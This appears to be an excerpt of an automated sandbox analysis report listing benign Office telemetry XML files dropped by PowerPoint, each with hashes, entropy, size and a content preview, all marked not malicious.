                                                                                                                              SHA1:E3D8A9E71188D1B4285758CAF5387ABAB81BC3E9
                                                                                                                              SHA-256:EEC4A6773375C0A9B88EE019B51E40F237DBAB05FB58AB89A42567894A001FD0
                                                                                                                              SHA-512:E13AA61E6CC80BA461D036F6EA6A5F5BFEDE67441BA9AC51A047C6FF10C003255F1E9D921DD7D708392A8AADA06FBDC802E529DF254B7279D267F5B98234863C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140153" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ClosedCaptions.SelectCaption" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bw2bb" A="bv32b" />.. </S>.. <C T="B" I="0" O="false" N="CaptionTrackSelected">.. <S T="1" F="FCaptionTrackSelected" />.. </C>.. <C T="W" I="1" O="false" N="TrackLanguage">.. <S T="1" F="TrackLanguage" />.. </C>.. <C T="B" I="2" O="false" N="IsInBand">.. <S T="1" F="FIsInBand" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):521
                                                                                                                              Entropy (8bit):5.264436781611096
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdXciQBVk//GboWnerlHSsPAQ/r/M+0ivmNO2su:2ds5BOGmrdSmAQj/c
                                                                                                                              MD5:77DAFA8A18DDD74F581F9D5BF9A78D0C
                                                                                                                              SHA1:E111A7421AB35170A9ECE97DE3B15B71585008B4
                                                                                                                              SHA-256:F3621ECC5888F50CE84B7FEB953CC473003892444D4384010B3D918B578572B3
                                                                                                                              SHA-512:E8BE17718DD3595CB07A9460CA082877AA3539E7761B2E2FD02D8514710E9E47923CACA238F99C800A144899DDD77B1B524A426BECB0B0FE8FB8E3AE2849E05E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140155" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.FrameProtocol.AggregateInfoHandler" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bv0he" />.. </S>.. <C T="W" I="0" O="true" N="RequestOperation">.. <S T="1" F="RequestOperation" />.. </C>.. <C T="I32" I="1" O="true" N="ResponseErrorCode">.. <S T="1" F="ResponseErrorCode" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):791
                                                                                                                              Entropy (8bit):5.044313988565724
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdtrl/GboWnersXFJiQjL/juhNXDE/shNXp0WXHaSMNOA/HNUlu:2dOmr4v5fLsdEG8Wy7
                                                                                                                              MD5:3F4073DEF160D7E5F49601AC25DBB692
                                                                                                                              SHA1:8F3A64D3D5132E7719992DFE93A03218B0922636
                                                                                                                              SHA-256:47CBE6A7B9E26C0E12DFC38108D441AE89ABC7C971E32B977703C7073CD96CBC
                                                                                                                              SHA-512:50D3F5254C05C652AEDC07B289F8F46CAFE53E4614AE70E94D470CF4003F396C59C4F9BE84BCEA19A5F32A219B570887AE3A30835519198213E1A6A4B74E0308
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140156" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.SlideShow.NavigationPerf" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="ax7ko" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U64" I="0" O="false" N="MaxNavigationDuration">.. <A T="MAX">.. <S T="1" F="duration" />.. </A>.. </C>.. <C T="U64" I="1" O="false" N="AvgNavigationDuration">.. <A T="AVG">.. <S T="1" F="duration" />.. </A>.. </C>.. <C T="U32" I="2" O="false" N="NavigationCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="3" />.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):417
                                                                                                                              Entropy (8bit):5.314502750835963
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7dvkz9Q1+sUQnQgDTqte/GbOSIxSpRMFpAQUHperhbAJwLKBsfE39NOn2su:TMHdptrUyv/GbaAQier9BfEtNO2su
                                                                                                                              MD5:D16CB9C299ADA3D02B2DE841E8E72AD0
                                                                                                                              SHA1:614188E4840A3D17B33D916620D3118A3F3553C8
                                                                                                                              SHA-256:477301CA758E23B8F50ACFB184E2780F050439E9EB3EE1EB8B097A09F5843710
                                                                                                                              SHA-512:B316E4BA89DD44364DAD833E3689AA0789FC4B657879B6028A082933C3E82CBFFDD7A45291833AFC1F8717E191C2F2151ECE16F860A455B695DC39D44CD0A179
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140158" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.SurfacePenButton.Usage" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b2iky" />.. </S>.. <C T="I8" I="0" O="false" N="EventId">.. <S T="1" F="Event" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):846
                                                                                                                              Entropy (8bit):5.032661361955447
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdrrU8II0/GbaAQ4WneriSerifSNahW6+/CNWOyf/0//YShmMKH1StAntf7nLZ:2dLRryriq5qaPXX
                                                                                                                              MD5:4E68B22888487EE359584BD1186B3A29
                                                                                                                              SHA1:E8FDDC99FBAA4F182260A4B6B42B15A9675BD3D0
                                                                                                                              SHA-256:66BAC4F54BC761232DEC06968F3E916EA124F249A976196D546FA1ACC8D357A5
                                                                                                                              SHA-512:C027B76E0EDE4E58BAEBCA74EE666A2220364620A134043266B1912B612B934C3B2101F2EF0C8A67C4004481EEE5E5E9F820A706A83B2533D2585A4F838C927D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140159" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.SurfacePenButton.RegistrationAndUnregistrationFailure" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b066m" />.. <UTS T="2" Id="b066o" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="B" I="0" O="false" N="IsRegistration">.. <O T="EQ">.. <L>.. <S T="3" F="ULS_TagId" />.. </L>.. <R>.. <V V="b066m" T="W" />.. </R>.. </O>.. </C>.. <C T="U32" I="1" O="false" N="GetLastError">.. <S T="3" F="GetLastError" />.. </C>.. <C T="B" I="2" O="false" N="FProtectedView">.. <S T="3" F="FProtectedView" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):523
                                                                                                                              Entropy (8bit):5.272339482404428
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdPr+Lc/GbaAQierCznWgry+sGyFN5NO2su:2dQ3irmP4FV
                                                                                                                              MD5:93EA69C397DA3815F933A1DE3F2820E7
                                                                                                                              SHA1:0CB286AF4517AA1C58A8DCE7358FE7EA27069527
                                                                                                                              SHA-256:FF7A6D3428A50A98868AD222ED982D49B245AB843B78A8081A6AEB725C376B2F
                                                                                                                              SHA-512:213E825A5DCE83AE9D4B0DDE4FADA8C3251639DC414435B9553143D81934B318711304B8E968AF258737C586BAD704D5AFFCDE62C10B3B870E61DFA0AA3736A5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140172" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.EquationConverter.NumberOfEquations" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cpcqn" />.. </S>.. <C T="I32" I="0" O="true" N="ActionID">.. <S T="1" F="actionID" />.. </C>.. <C T="I32" I="1" O="true" N="NumEquations">.. <S T="1" F="numEquations" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):901
                                                                                                                              Entropy (8bit):5.0595656786277035
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd2rR1Ys9S/GbaAQ4Wner6fer8erI/BjEano+HaSMjmqXHhSMpDXHISMNO3XGo:2dq6s9NRrLrjrIJFoFmqko
                                                                                                                              MD5:8276912E5C29B12A5B9E9B286989B9AD
                                                                                                                              SHA1:E3FDF7AC6844B0ACA242D0C8676412A1F41AB6A1
                                                                                                                              SHA-256:DCD1C9531FE042F4D637068AC26FBDB869D717328003C0E048F184FB22F6F173
                                                                                                                              SHA-512:9542467131D7EB4849F3650C3D20EF03168A3967ECF7198BC23AC0BCC60AA7C7CCB74284B4D5EF8D9B916036E597A0BEBC284EE5E7DFE46810676B8D4DDB5768
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140173" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Media.OnlineVideoActivation" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b574v" />.. <UTS T="2" Id="b574w" />.. <UTS T="3" Id="b574x" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="YouTubeFlashURLToIFrameURLSuccess">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="YouTubeFlashURLToIFrameURLFailure">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="NotYouTubeFlashURL">.. <C>.. <S T="3" />.. </C>.. </C>.. <T>.. <S T="4" />.. <S T="5" />.. </T>.. <ST>.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):571
                                                                                                                              Entropy (8bit):5.285572522102252
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd1rcQpgu/GbaAQXeriHszn8fAGpgMaBuf6cBJNO2su:2dGQQjriH48lpg1uycB/
                                                                                                                              MD5:2C5C0544633DF145A8D0941532C42037
                                                                                                                              SHA1:70B9E6C8A7516E85B0382ABB37D312F1FC2274AC
                                                                                                                              SHA-256:6E58E16A2619D95A3302907BD4AAF8C0BE7D1A5AD9A140901CE3F8130E4B3ED2
                                                                                                                              SHA-512:258E71F87BC838B32280911943F61C89DE76542641264DDF236B0561D7E0879B7BA63B504279D400B30530FBD61E5747A6133A675216A6E266AFA85FD01EDF1A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140174" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.MergeLifeguard.RecoverViewSet" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ctf9t" />.. </S>.. <C T="U32" I="0" O="true" N="ActiveViewType">.. <S T="1" F="Active ViewType" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="NavigationViewType">.. <S T="1" F="Navigation ViewType" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):586
                                                                                                                              Entropy (8bit):4.910689079143839
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBxcfG/GbSerZerIOSNahWgCNWOyf/0//qehmMNOcsu:2dBafBFrEripaM
                                                                                                                              MD5:EBDB26672349224B0E9D5E7EA59D7FB4
                                                                                                                              SHA1:D3ECFEAFAAA910E7C00329DCBBC768D333789516
                                                                                                                              SHA-256:EDD31520DD6003A25F1AECC98A07F1087C5F4A2150D475A9D2DCBCFC52DC3099
                                                                                                                              SHA-512:ECEA881E09A1BAA52DB8EE6699031779E6E36F6AFECFF53C74BF3F1DE6E79045A732035036A5887CCBE07B05EBEB5BD79C4A62E09B440EBB31613FBCF377D472
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140176" V="0" DC="SM" EN="Office.PowerPoint.PPT.SlideShowDuringZRT" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cx67y" />.. <UTS T="2" Id="cx67z" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="B" I="0" O="false" N="UserAborted">.. <O T="EQ">.. <L>.. <S T="3" F="ULS_TagId" />.. </L>.. <R>.. <V V="cx67y" T="W" />.. </R>.. </O>.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3424
                                                                                                                              Entropy (8bit):3.4244336604179884
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d3mr5uAQQ9RQSLQtSQldTLQdRQILQ6yJYrZm1VKTKnAd:c2duAQYjd2nAp7yJFVw7
                                                                                                                              MD5:AD730A362DF504E3B9ED60A129F1D736
                                                                                                                              SHA1:A6D65C77F9A2FC056350302F981696B9328D58E3
                                                                                                                              SHA-256:A122DEC24998CD6188583C91161BFE77FC2CD0F5EDE1A7B071E141CFF7FCB060
                                                                                                                              SHA-512:58A4AE4936415D3BB442A885C9CB6BCF9987571266D616F8AD48C677366B2EDA528503CEEBB39146F049C2D704CDC3B1D8D90171D695A449615FADDFFACCE7D6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140177" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PPTPasteActions" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="awna7" />.. <F T="2">.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ActionId" M="Ignore" />.. </L>.. <R>.. <V V="1951" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="ActionId" M="Ignore" />.. </L>.. <R>.. <V V="1941" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LE">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):852
                                                                                                                              Entropy (8bit):5.128233984713664
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdRrc92Wmo//GbHer8qzuHRyoXMWHRyHaaeXM9ady9uHRcbMWHRcsadVpMSaMM:2dRI92oG+rUcCcgF58w+xExM
                                                                                                                              MD5:A04983591B45AE66CBD818EB859BC031
                                                                                                                              SHA1:CCED248B5323EBBCF682035203D928EBCBFE70C3
                                                                                                                              SHA-256:07D570DC0E532AB9229EF64166C7D0F8C83839D47673B2C056966253B9FB4F95
                                                                                                                              SHA-512:3FE2F0F096F58377BCE5619DD102CDCC19DCA8B4F1ADC05E6FFA7FC6BDF7C434FC5F98198026A1FD87D08646D26AD1B1651A5D9A6DED21CAD12620DE98B7F3CE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140178" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.OCS.PingPongDetected" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ctk04" />.. </S>.. <C T="U32" I="0" O="true" N="MaxConflictCount">.. <S T="1" F="MaxConflictCount" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="MaxSameHashCount">.. <S T="1" F="MaxSameHashCount" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="MaxConflictPartName">.. <S T="1" F="MaxConflictPartName" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="MaxSameHashPartName">.. <S T="1" F="MaxSameHashPartName" M="Ignore" />.. </C>.. <C T="G" I="4" O="true" N="ServerDocId">.. <S T="1" F="ServerDocId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):507
                                                                                                                              Entropy (8bit):5.198716261807297
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd16rm4jm/GbSerqWIFI9G1xOxxkNO2su:2dWFraxExM
                                                                                                                              MD5:930F3228DE0776000575681FBAB5EA5D
                                                                                                                              SHA1:2A2265B7E56750A9BBE2EFFB4CA3D1F358D5D84F
                                                                                                                              SHA-256:1C07D806EB73B3DF7CE95838C5E17E922F4156783D45EA923D4CE1692E8D5C03
                                                                                                                              SHA-512:DA4C8E1B1FE11F79778407B11B59E669ACC0F0A26A1B21B28BE88A48F98097D4686B779A0AA4096B4923ED56BB94B44238725406450BBB3AEE843008366E63B3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140180" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PresentToTeams.DeeplinkInfo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="89a64" />.. </S>.. <C T="G" I="0" O="true" N="DeeplinkId">.. <S T="1" F="deeplinkId" M="Ignore" />.. </C>.. <C T="G" I="1" O="true" N="ServerDocId">.. <S T="1" F="ServerDocId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):752
                                                                                                                              Entropy (8bit):5.106123546265731
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdk6rJg/GbSerPgBL+//LlMnG3DntLrnFTQnHDaCqNYCSNO2su:2dkSrFrPq+bl3uVoC
                                                                                                                              MD5:B3C82A0B178F8B2B97BE6CD1CB165AC7
                                                                                                                              SHA1:D0348B97A71D0DC2C60CCF86EBCBA4FDD8C78AE5
                                                                                                                              SHA-256:43F336D8C4FF1FFD3EAC490CDB40285CE17BFF479FC9517141C78035736490B3
                                                                                                                              SHA-512:86FB62CED39A0F44E02BF0B7F3F18070A2C3D6AC0BCCB3C85A293AE8D9B33DB69BBD24E548AEE86BCD120280DB04271BCA499223C8E8C3278B334CD6B8E4DDBF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140181" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ClosedCaptions.PlayMediaEx" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="7kq91" />.. </S>.. <C T="B" I="0" O="false" N="IsNarration">.. <S T="1" F="FIsNarration" />.. </C>.. <C T="B" I="1" O="false" N="CaptionEnabled">.. <S T="1" F="FCaptionsVisible" />.. </C>.. <C T="B" I="2" O="false" N="IsVideo">.. <S T="1" F="FIsVideo" />.. </C>.. <C T="B" I="3" O="false" N="IsPlayerMuted">.. <S T="1" F="FIsPlayerMuted" />.. </C>.. <C T="B" I="4" O="false" N="IsResuming">.. <S T="1" F="FIsResuming" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4672
                                                                                                                              Entropy (8bit):4.836208373168191
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c2T+Mzqp3Jp1Tys5vf1TyD8F1TZi2sW4+hwpHCCx8hsb4kywydlunHaHNHtG:6jBFJWEkrf+a1zxV4kXMlunHatHtG
                                                                                                                              MD5:5EC556790F7B4E2CF1B4E92768290B47
                                                                                                                              SHA1:F2F0C749D107DDAD286485FFCEAAADA82434E03B
                                                                                                                              SHA-256:2EFBCA2F5A6B6D40072C62F0782B9584FBC33CB0111FB4E1D7899EF06FEA711F
                                                                                                                              SHA-512:09FE33C32CD02018B0AB5A61C4A0AE87AEDA610C95A4A793B886CCE8E993443089532A72FEE4824E69355B78D25DF9B788F5B56CCEE6E976B9A633B437BE8E78
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140200" V="12" DC="SM" EN="Office.PowerPoint.PPT.Desktop.FileSave" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UACS T="1" S="Unexpected Assert" />.. <UTS T="2" Id="av2pt" />.. <UTS T="3" Id="axn4z" />.. <UTS T="4" Id="a7nor" />.. <UTS T="5" Id="av2pu" />.. <F T="6">.. <O T="EQ">.. <L>.. <S T="5" F="Operation" M="Ignore" />.. </L>.. <R>.. <V V="Save" T="W" />.. </R>.. </O>.. </F>.. <UTS T="7" Id="aud42" A="a9j8m" />.. <F T="8">.. <O T="EQ">.. <L>.. <S T="7" F="Operation" M="Ignore" />.. </L>.. <R>.. <V V="Save" T="W" />.. </R>.. </O>.. </F>.. <UTS T="9" Id="a1cck" A="a9j8m" />.. <F T="10">.. <O T="EQ">.. <L>.. <S T="9" F="Operation" M="Ignore" />.. </L>.. <R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2821
                                                                                                                              Entropy (8bit):4.566207672414695
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cFtjbuyBtt4IX+CQEJPX8vdsCKjqIKB+2epDtCm:uVbuutbOC3ds1HH+Nym
                                                                                                                              MD5:1EE41D7ED90230684A1C86F2716D240F
                                                                                                                              SHA1:95F5E0510681CB2D58938C772C0A2CF7FC1B3516
                                                                                                                              SHA-256:722E7B9ACEB8BA9268BF9E5DA67A4839180FC347F69145D95427B264A791E9C5
                                                                                                                              SHA-512:CAEB8DF6D6BEE8DFFAD252B5B6A92A534DEC401E86E7E92B13A918E752786CBAD1D873BAF619A00564D02FF761AE3347950C7ED64FC3C78A1ABED947676F37C9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140202" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.CoAuthActivity" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="ban7v" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" M="Ignore" />.. </L>.. <R>.. <V V="Scope" T="W" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="ScopeAction" M="Ignore" />.. </L>.. <R>.. <V V="Complete" T="W" />.. </R>.. </O>.. </F>.. <UTS T="4" Id="ban7q" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="ULS_Category" M="Ignore" />.. </L>.. <R>.. <V V="Scope" T="W" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="5" F="ScopeAction" M="Ignore"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2185
                                                                                                                              Entropy (8bit):4.9501327758640326
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dxGmr6rQr5rVrXrELuyu1bJUG1Sx4+95Jmz+EfpNn3my0K:cxpeUlJbwu3bqGUDmz7RVZ
                                                                                                                              MD5:F35487D89FB6C31DCD6799860DE731A5
                                                                                                                              SHA1:C6BFA18DF2F24178611D77946A27A582CF250B20
                                                                                                                              SHA-256:64C8D6C17D5654876FB1EB663A1709D9D7D6085894344CB29FA6FC1C256693B5
                                                                                                                              SHA-512:0C3925A1090AB5F405BD8D41D2C80CCAA42F1D5003F955081F7343CF70C440DA4F0EEECD809E20C07534044C1F3AED097A2A4F97C365C4AD0F786A4295844941
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140203" V="2" DC="SM" EN="Office.PowerPoint.PPT.LayoutDedup" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bb5qu" />.. <UTS T="2" Id="bb5qv" />.. <UTS T="3" Id="bb5qr" />.. <UTS T="4" Id="bb5qs" />.. <UTS T="5" Id="bb5qj" />.. <UTS T="6" Id="bb5qk" />.. </S>.. <C T="U32" I="0" O="true" N="TotalSlideMastersBefore">.. <S T="1" F="Total SlideMasters" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="TotalSlideMastersAfter">.. <S T="2" F="Total SlideMasters" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="SlideMasterReducedListCount">.. <S T="2" F="Total SlideMasters reduced" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="TotalSlideLayoutsBefore">.. <S T="1" F="Total SlideLayouts" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="TotalSlideLayoutsAfter">.. <S T="2" F="Total SlideLayouts" M="Ignore" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):514
                                                                                                                              Entropy (8bit):5.196477647638832
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnrNIfv/GbSerKVHCZUiHCqMnIB3IyvB4MNO2su:2djFrOnKhX4k
                                                                                                                              MD5:A6A4010A7582FB9AC47E8DB89626319F
                                                                                                                              SHA1:F1EB94804C82734F37E94AC4FE1BE02A243BF697
                                                                                                                              SHA-256:804498737BB7F02522124A0F30B89EB72CF31B8337E424DE8B284FDCE07CC103
                                                                                                                              SHA-512:6AF4ED6D096B93696B133687B720E55861C946BCC34383E2A2CC6C7506F749279FD51E2C6FD5E6C17668D52486AF81BCEB3E96984404B282A4229577B5C66637
                                                                                                                              Malicious:false
